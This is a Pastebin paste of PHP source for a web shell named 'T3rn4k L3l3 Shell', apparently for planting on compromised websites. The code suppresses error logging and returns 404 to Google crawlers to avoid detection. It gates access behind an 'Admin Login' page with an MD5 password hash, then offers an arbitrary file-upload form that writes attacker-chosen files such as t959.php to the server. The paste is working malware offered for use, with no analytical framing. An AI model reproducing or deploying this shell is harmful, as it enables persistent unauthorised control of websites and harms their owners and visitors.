Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- // Default pas [x48]
- $auth_pass="3a81b4227cff025aa3a198377f3a849b";
- $color = "#FFFF00";
- $default_action = 'FilesMan';
- @define('SELF_PATH', __FILE__);
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('html_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- @ini_set('file_uploads',1);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @clearstatcache();
- @define('VERSION', '2.1');
- if( get_magic_quotes_gpc() ) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- function printLogin() {
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <title>Admin Login</title>
- <meta name="robots" content="noindex, nofollow, noarchive">
- <link rel="icon" href="http://www.go-lock.club/favicon.ico" />
- <link href="http://fonts.googleapis.com/css?family=Atomic+Age" rel="stylesheet" type="text/css"> <style type="text/css">
- body{ background:#000000; font-size:11px; font-family:Atomic Age; color:#fff; }
- #main{ background:darkred; padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px; width:100%; border:1px solid #fff;font-family:Atomic Age; }
- .gaya { color:#fff; font-weight:bold; }
- .inputz { background:black; border:0; padding:2px; border:1px solid white; font-size:11px; color:white; font-family:Atomic Age; }
- .inputzbut{ font-size:11px; background:darkred; color:#fff; margin:0 4px; border:1px solid white; font-family:Atomic Age; }
- .footer{ text-align:right; padding:0 16px; font-size:10px; letter-spacing:2px; color:white; }
- </style>
- </head>
- <body>
- <table id="main">
- <tr>
- <td> <br />
- <center><img src="https://cdn.pbrd.co/images/6RXeCi5n8.png" width="100" height="100" /></center><br />
- <div style="width:100%;text-align:center;">
- <form action="" method="post">
- <img src="https://static.xx.fbcdn.net/images/emoji.php/v8/e31/1/16/PACMAN.png" style="margin:2px;vertical-align:middle;" width="12px" height="12px" /> Admin Login
- <input class="inputz" type="password" name="pass" style="width:120px;" value="" /> <input class="inputzbut" type="submit" value=" Login >> " name="submitlogin" style="width:80px;" />
- </form>
- </div>
- <br />
- </td>
- </tr>
- </table>
- <p class="footer"><a href="http://www.go-lock.club">Go-Lock Blog</a> © 2017
- </p>
- </body>
- </html>
- <?php
- exit;
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
- if( empty( $auth_pass ) ||
- ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- printLogin();
- if(isset($_GET['log']) && ($_GET['log'] == 'out'))
- {
- ?>
- <?php
- unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
- }
- ?>
- <html>
- <head>
- <link href='http://fonts.googleapis.com/css?family=Federant' rel='stylesheet' type='text/css'/>
- <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css" />
- <style type="text/css">
- body {
- background:black; font-size:11px;
- font-family: Federant;
- color: white; }
- a {
- color: dodgerblue;
- font-family: Federant;
- }
- a:hover {
- border-bottom:1px solid aqua;
- }
- #menu a {
- font-family: Federant;
- padding:4px 15px;
- margin:0;
- background:darkred;
- color:white;
- text-decoration:none;
- letter-spacing:2px;
- -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
- }
- #menu a:hover {
- padding:4px 15px;
- margin:0;
- font-family: Federant;
- background: grey;
- color:white;
- text-decoration:none;
- letter-spacing:2px;
- -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
- }
- textarea {
- width:600px;
- height:200px;
- background: black;
- border:1px solid darkred;
- color: white;
- font-family: Federant;
- }
- input[type=text] , input[type=file] , select {
- background:black;
- color:white;border: 1px solid darkred;
- padding:6px 6px 6px 6px;
- font-family: Federant;
- }
- input[type=submit] {
- background:#b70505;
- color:white;border: 1px solid #000;
- padding:6px 6px 6px 6px;
- font-family: Federant;
- }
- .subbtn:hover {
- background:#c0bfbf;
- color:#000000;
- font-family: Federant;
- }
- td, th { font-size: 12pt; text-align: left; vertical-align: top; color: dodgerblue; }
- h1 { font-size: 16pt; text-align: center; }
- h1 a { color: #000000 !important; text-decoration: none; }
- p { text-align: center; font-size: 9pt; }
- p a { color: #666666 !important; }
- table { margin: 0 auto; border-collapse: collapse; border: 1px solid #ffffff; min-width: 400px; }
- th, td { padding: 5px 10px; }
- th { background: black; color: #ffffff; }
- td a { color: dodgerblue !important; text-decoration: none; }
- th img { position: relative; top: -3px; left: 2px; }
- td { border-bottom: 1px solid #cccccc; background: black; }
- tr.odd td { background: black; }
- #lol a {
- padding:4px 15px;
- margin:0;
- background:darkgreen;
- color:white;
- text-decoration:none;
- letter-spacing:2px;
- -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
- }
- </style>
- <title>T3rn4k L3l3 Shell</title>
- <br />
- <center> <font color="red" face="iceland" size="10">T3rn4k L3l3 Shell</font>
- <br />
- <br />
- <br />
- <form action="" method="post" enctype="multipart/form-data">
- File : <input type="file" name="file" />
- <br />
- <br />
- Nama Baru : <input type="text" name="ufile" value="t959.php" />
- <br />
- <br />
- <input name="upload" type="submit" value="Upload" />
- </form>
- <?php if (isset($_REQUEST['ufile'])) { $ufile = $_POST ['ufile' ] ; } if (isset($_REQUEST['upload'])) { if ($_POST ['upload' ]){ if (@copy ($_FILES ['file' ]['tmp_name' ], $ufile )) {
- echo "<b><font color='green'><a href='$ufile'>$ufile</a> = File Sukses Di Upload !!!</font></b>" ;
- } else {
- echo "<b><font color='red'><a href='$ufile'>$ufile</a> = File Gagal Di Upload !!!</font></b>" ;
- } } }
- ?></center>
Advertisement
Add Comment
Please, Sign In to add comment